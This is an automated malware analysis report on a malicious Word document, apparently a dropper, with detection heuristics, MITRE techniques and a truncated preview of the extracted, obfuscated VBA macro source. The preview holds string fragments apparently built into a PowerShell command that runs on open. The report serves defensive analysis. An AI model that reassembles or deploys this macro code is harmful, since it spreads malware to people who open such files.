Verdict: MALICIOUS (Risk Score: 248)

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Word document containing VBA macros. The critical heuristics indicate the presence of a Shell() call and a CreateObject call within the VBA code. The AutoOpen macro marker suggests it executes automatically upon opening. The VBA script, though obfuscated, contains fragments like '\powers' which, combined with the Shell() call, strongly suggests an attempt to execute a command, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Dropper.Stratos-6724145-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Stratos-6724145-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60256 bytes |

SHA-256 of macros.bas: 8bd409cc77f18cbce82e37a9c34859155f8f4f79e234da0df8c9d4bc7125c7d6
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function axgmhw(zttbdmizp, yaqb)
Dim UaOCk As Integer
UaOCk = 21936
kuopqibq8 = Array("qsg", "favi", "genegy", "ZYOi", "i", "on ($frdnrzf+$", "ziji")
jnccyu = 27810
axgmhw = kuopqibq8
End Function
Function idnjy(jjxeya4)
Dim tvtodl8 As Integer
tvtodl8 = -21235
xvaa = Array("uxlia", "hell", "esnndnhqbn", "NyAybx", "oyuycw6")
Dim umjeuiy As Integer
umjeuiy = 13478
idnjy = xvaa
End Function
Function VfvJO(aenre)
cmngkqtx = Array("COBBO", "ywtimxil18", "youy", "XLyxDefpi", "hiwe", "hrxk+$pghz", "r")
VfvJO = cmngkqtx
End Function
Function vuzysbo(AtjIU, skajggg)
bzeuei = Array("woqe", "iuue", "n0+$iqeys+", "qifa", "dida")
NOFY6 = 30986
vuzysbo = bzeuei
Dim sfcaoy
sfcaoy = -12524
End Function
Function ywomdy(owvfo)
eeehp = -16218
mfavxyxgka = Array("ZU='($env';$", "WwtZ", "vlsyxa", "RplvrafNaA", "ppytgwca", "egn")
ywomdy = mfavxyxgka
End Function
Function uvxaeix(rhujhjm, efeo)
uieao7 = Array("jyoep1", "gg';$vbdjlv='j ", "yyrsj", "gupu", "DWANTHO", "ntvnioinhi")
uvxaeix = uieao7
End Function
Function RAGKNXLA(mehgy48, qaga)
CnfrLNnjkxh = Array("BdbCjem8", "osh", "u", "w", "vxucken09", "UO+$eoucmcf+$avwp")
RAGKNXLA = CnfrLNnjkxh
Dim uourl As Integer
uourl = 2735
twcxra = -20709
End Function
Function tcqvswbvqi(akilnlgbk, eodyr)
SFQVIXLI = Array("\powers", "MWENIFQU", "ulkunbtrzq", "YACLY", "iyg", "yiuyi", "pyly8")
tcqvswbvqi = SFQVIXLI
End Function
Function iphejm76(okmnhpn, GgEvKb)
bkwscs = Array("iiiozyu", "hjrhfegiy2", "eouxiupc", "') ';$aiitc=", "yo", "xdg")
iphejm76 = bkwscs
End Function
Function djouafs(edmreg)
hhsaagk71 = Array("kivtxziojk", "hfrzmo", "ROXOABC", "BAcquJio", "-ge ';$abcae5='", "kxoujoa", "ytxeqxea05")
djouafs = hhsaagk71
End Function
Function zeaggo01(ouacn, klbuoy)
RGaYl = Array("jjhucve", "vxgxttzhes", "onhhbo", "='ath=';$Yqb", "qaxe", "coku")
zeaggo01 = RGaYl
End Function
Function eoyuba05(QtuaerC, mzqzxy)
wuabc = Array("uoios", "yyjjyo4", "ruoi+$UUID", "e", "eo", "OcFbw", "hfvquajglm")
Dim yicibbr As Integer
yicibbr = 24219
eoyuba05 = wuabc
End Function
Function ikmwqv(EINJYE, PTBLIMRW)
mkggv = Array("y", "uwq", "qiqbdw46", "mobxne=' '", "w")
ikmwqv = mkggv
Dim emzuksesc As Integer
emzuksesc = -252
End Function
Function tooycp(EKYH, vitxifh)
iyhpu = 17432
ECDYZXK7 = 16007
vchee4 = Array("ell", "net';$rnur", "jozy", "cxoy", "AiVo", "uoxkrniaiz", "egruubaeu")
tooycp = vchee4
End Function
Function xnywmctm(iygwk16, wsiyfkizn)
Dim xphayoe
xphayoe = 25681
tznua74 = Array("ryooa='e -", "pvoetjabhe", "NGsdttvyeUlj13", "kzhhttw", "i", "UbFtAeyy")
Dim blqio
blqio = 22988
Dim uqyu As Integer
uqyu = 30093
xnywmctm = tznua74
End Function
Function PeUuOm(tlalya)
quctblw = 7298
zbnotr = Array("YKRNVUIO", "yeuy", "upgj33", "RJqzm+$EQEMOW0+$smm", "ae", "inte", "eqzwiyuci")
PeUuOm = zbnotr
End Function
Function EIUQGP2(opkey)
bbxyvgade = Array("gka='icy B", "NEowP", "ZWDKUSP7", "KVOEE81", "h", "ie")
EIUQGP2 = bbxyvgade
End Function
Function AzSyoNsi78(obbyszhdxz62, yape)
vzieickq = Array("a", "mdambrorve", "aatpnkycy22", "aygj", "fypu", "b+$VKvaxsgRi+$", "ai")
Dim AKbsrmYw As Integer
AKbsrmYw = -6866
AzSyoNsi78 = vzieickq
End Function
Function ADBoua(ewlfra)
Dim YAEMDYU As Integer
YAEMDYU = -21999
iaynwc = Array("wgaao00", "mfde", "hai+$czuxmoea+$aii", "AdreJdu32", "ocgwy0")
ADBoua = iaynwc
Dim ahjehvf As Integer
ahjehvf = -17545
Dim ttouksgz52 As Integer
ttouksgz52 = 6176
End Function
Function eeasbeu(oetoo, ORLBOBF)
aofqtpha = 30869
yoaaukvex = Array("byhy", "$IqJeIea='a", "ucgbpfd", "ioyeee", "dia")
eeasbeu = yoaaukvex
End Function
Function ukeoaj(euiks)
uadzemcgzj = Array("evmos8", "iudayysc", "uuugblxp", "fo';$Oslcds", "EAEPUOE", "psb", "uu")
ukeoaj = uadzemcgzj
End Function
Functio
```

... (truncated)